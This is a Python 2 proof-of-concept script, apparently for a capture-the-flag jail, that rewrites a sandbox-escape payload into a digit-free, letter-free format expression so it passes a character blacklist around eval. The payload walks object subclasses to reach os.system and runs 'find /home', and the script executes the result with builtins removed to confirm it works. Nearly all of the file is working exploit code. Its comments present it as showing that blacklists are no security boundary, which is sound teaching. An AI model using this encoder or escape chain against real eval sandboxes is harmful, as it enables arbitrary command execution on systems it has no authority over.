# -*- coding: utf-8 -*-
from sys import exit
# Proof-of-concept generator for a Python 2 "restricted character set" eval
# bypass: it rewrites `payload` as a `%`-formatting expression built only from
# characters outside `disallowed`, then evaluates the result with builtins
# removed to confirm it still executes.  Python 2 only (print statements,
# backtick repr, xrange, file(), `exec ... in`).
# Risk/mitigation: this is the standard demonstration that a character
# blacklist around eval()/exec is not a security boundary; the only robust
# control is to never evaluate attacker-influenced source at all.

# Rewrite the small integer literals -2, -1, 0, 1 in str(x) as boolean/bitwise
# expressions that contain no digits or letters.  Substitution order matters:
# '-2' and '-1' are handled before '0' and '1' so the '1' inside '-1' is not
# rewritten a second time.
rw = lambda x: str(x).replace('-2', "~({}<())").replace('-1', "~(''<'')").replace('0', "~~(''<'')").replace('1', "~~({}<())")
# Characters the encoder must avoid in its output (presumably the set the
# target filter rejects -- TODO confirm against the actual filter).
disallowed = '!"#$&*+-/0123456789;=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^abcdefghijklmnopqrstuvwxyz|\r'
#payload = "().__class__.__subclasses__()[0].__new__.__globals__['__builtins__']['input']()"
# The expression to encode.  The subclass index (48) is interpreter-specific;
# it was chosen for the author's environment and is not stable across versions.
payload = "().__class__.__bases__[0].__subclasses__()[48].__init__.__globals__['linecache'].os.system('find /home')"
# Pass 1: build the format string.  Each payload character becomes a fragment
# of a `%`-format template; characters that may appear literally are kept,
# everything else becomes a conversion specifier whose argument is supplied
# in pass 2.
fstr = ''
for i, c in enumerate(payload):
    if c in '$':
        fstr += '___%\xdd'
    elif c in '0123456789abcdef':
        # hex digit folded into a single high byte (0xC0 | nibble)
        fstr += chr(0xC0 | int(c, 16))
    elif c in disallowed or c in "'\n ":
        fstr += "___%\xcc"
    elif c == '%':
        fstr += '___%___%'
    else:
        fstr += '___%s' % c
# Wrap the template in a backtick repr, then select every 4th character
# starting at offset 4 ([4::4] spelled without digits) before applying `%(`.
formatter = '`\'%s\'`' % fstr
formatter += rw("[1<<1<<1::1<<1<<1]")
formatter += '%('
# Bookkeeping only: encoded length per distinct payload character (printed below).
charsizes = {}
# Digit-free spellings of powers of two.  Per the commented-out check below,
# ppots[i] is intended to evaluate to 1<<i and npots[i] to -1<<i.
ppots = rw('''1
1<<1
1<<1<<1
1<<~(-2<<1)
1<<~(-2<<1)<<1
1<<~(-2<<1)<<1<<1
1<<~(-2<<1)<<~(-2<<1)
1<<~(-2<<1)<<~(-2<<1)<<1
''').split('\n')
npots = rw('''-1
-2
-2<<1
-2<<1<<1
-2<<~(-2<<1)
-2<<(1<<1<<1)
-2<<(1<<1<<1)<<1
-2<<~(-2<<1)<<~(-2<<1)
''').split('\n')
#for i in xrange(8):
# print i, 1<<i, eval(ppots[i]), '*%i*' % len(ppots[i])
#for i in xrange(8):
# print i, -1<<i, eval(npots[i]), '*%i*' % len(npots[i])
#exit()
# Pass 2: emit one comma-separated argument for each conversion specifier
# produced in pass 1 (characters kept literally in pass 1 emit nothing).
for c in payload:
    oc = c
    start = len(formatter)
    if c not in disallowed and c not in "'\n ":
        pass#formatter += `c` + ','
    elif c == '$':
        formatter += rw(-1) + ','
    elif c == "'":
        formatter += "`''`["
        formatter += rw(0)
        formatter += '],'
    elif c in '0123456789bcdef':
        pass
    elif c in '\\x':
        # index into the repr of a single high byte
        formatter += "`'\xc0'`["
        if c == '\\':
            formatter += rw(1)
        elif c == 'x':
            formatter += rw('1<<1')
        formatter += '],'
    elif c in 'True':
        # index into the repr of a True comparison
        formatter += '`{}<()`['
        if c == 'T':
            formatter += rw(0)
        elif c == 'r':
            formatter += rw(1)
        elif c == 'u':
            formatter += rw(-2)
        elif c == 'e':
            formatter += rw(-1)
        formatter += '],'
    elif c in 'False':
        # index into the repr of a False comparison
        formatter += "`''<''`["
        if c == 'F':
            formatter += rw(0)
        elif c == 'a':
            formatter += rw(1)
        elif c == 'l':
            formatter += rw('1<<1')
        elif c == 's':
            formatter += rw(-2)
        elif c == 'e':
            formatter += rw(-1)
        formatter += '],'
    elif c == '-':
        formatter += "`~(''<'')`["
        formatter += rw(0)
        formatter += '],'
    elif c == ' ':
        formatter += ppots[5] + ','
    else:
        # Generic case: express ord(c) as a chain of `%` operations over
        # negative powers of two, starting from the all-ones value of the
        # same bit length and subtracting one power of two per iteration.
        c = ord(c)
        blength = c.bit_length()
        init = '~(' + npots[blength] + ')'
        ival = (1<<blength) - 1
        first = True
        while ival > c:
            diff = ival - c
            target = diff.bit_length() - 1
            tx = npots[target]
            ival -= 1 << target
            if ival == c and target < 2:
                init = tx + '%(' + init + ')'
            else:
                # the first wrap needs no outer parentheses around init
                if first:
                    init = "(" + tx + ")%" + init + ''
                else:
                    init = "(" + tx + ")%(" + init + ')'
                first = False
        formatter += init + ','
    charsizes[oc] = len(formatter) - start
# Drop the trailing comma and close the argument tuple.
formatter = formatter[:-1]
formatter += ')'
print charsizes
print formatter
print len(formatter)
# NOTE(review): the file object is never explicitly closed; on CPython it is
# flushed when the reference is dropped, but the close should be explicit.
file('payload.py', 'w').write(formatter)
# Sanity check: the encoded expression should evaluate back to `payload`.
print `eval(formatter, {})`
# Simulate a builtins-stripped environment and confirm the result still runs.
a = None
_eval = eval
# `ident` is built but never used below.
ident = ''.join((chr(i) for i in xrange(256)))
__builtins__.__dict__.clear()
__builtins__ = None
# NOTE(review): `exec ... in {}` assigns `a` inside the throwaway namespace,
# not the module-level `a` above, so the print below is expected to show None.
exec 'a=' + _eval(formatter, {}) in {}
print 'return value:', a